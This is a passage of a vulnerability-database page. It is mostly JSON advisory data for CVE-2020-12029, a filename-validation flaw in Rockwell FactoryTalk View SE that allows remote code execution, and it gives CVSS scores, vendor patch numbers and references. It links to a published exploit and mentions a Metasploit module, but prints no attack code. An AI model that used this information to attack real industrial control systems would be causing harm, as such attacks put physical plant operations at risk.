    "description": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx.",
    "id": "GSD-2020-12029",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2020-12029"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2020-12029"
      ],
      "details": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx.",
      "id": "GSD-2020-12029",
      "modified": "2023-12-13T01:21:49.512992Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "ics-cert@hq.dhs.gov",
        "DATE_PUBLIC": "2020-06-18T00:00:00.000Z",
        "ID": "CVE-2020-12029",
        "STATE": "PUBLIC",
        "TITLE": "Rockwell Automation FactoryTalk View SE"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "FactoryTalk View SE",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "all versions"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Rockwell Automation"
            }
          ]
        }
      },
      "credit": [
        {
          "lang": "eng",
          "value": "Trend Micro\u2019s Zero Day Initiative reported these vulnerabilities to Rockwell Automation"
        }
      ],
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
          }
        ]
      },
      "generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "IMPROPER INPUT VALIDATION CWE-20"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05",
            "refsource": "MISC",
            "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
          },
          {
            "name": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944",
            "refsource": "MISC",
            "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
          },
          {
            "name": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
          }
        ]
      },
      "solution": [
        {
          "lang": "eng",
          "value": "Rockwell Automation has released new versions of the affected products to mitigate the reported vulnerabilities. Affected users who are not able to apply the latest update are encouraged to seek additional mitigations or workarounds from the vendor\u2019s published guidelines in their security advisory.\nRockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
        }
      ],
      "source": {
        "advisory": "ICSA-20-170-05 Rockwell Automation FactoryTalk View SE",
        "discovery": "EXTERNAL"
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:rockwellautomation:factorytalk_view:-:*:*:*:se:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2020-12029"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-20"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944",
              "refsource": "MISC",
              "tags": [
                "Vendor Advisory"
              ],
              "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
            },
            {
              "name": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05",
              "refsource": "MISC",
              "tags": [
                "Third Party Advisory",
                "US Government Resource"
              ],
              "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
            },
            {
              "name": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://packetstormsecurity.com/files/160156/Rockwell-FactoryTalk-View-SE-SCADA-Unauthenticated-Remote-Code-Execution.html"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 8.6,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": true
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2022-01-04T16:37Z",
      "publishedDate": "2020-07-20T15:15Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2020-12029

Vulnerability from cvelistv5

ghsa-v98p-v8hm-3f7c

Vulnerability from github

fkie_cve-2020-12029

Vulnerability from fkie_nvd

ICSA-20-170-05

Vulnerability from csaf_cisa

icsa-20-170-05

Vulnerability from csaf_cisa

var-202007-0195

Vulnerability from variot

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

gsd-2020-12029

Vulnerability from gsd

Tags

Sightings

Nomenclature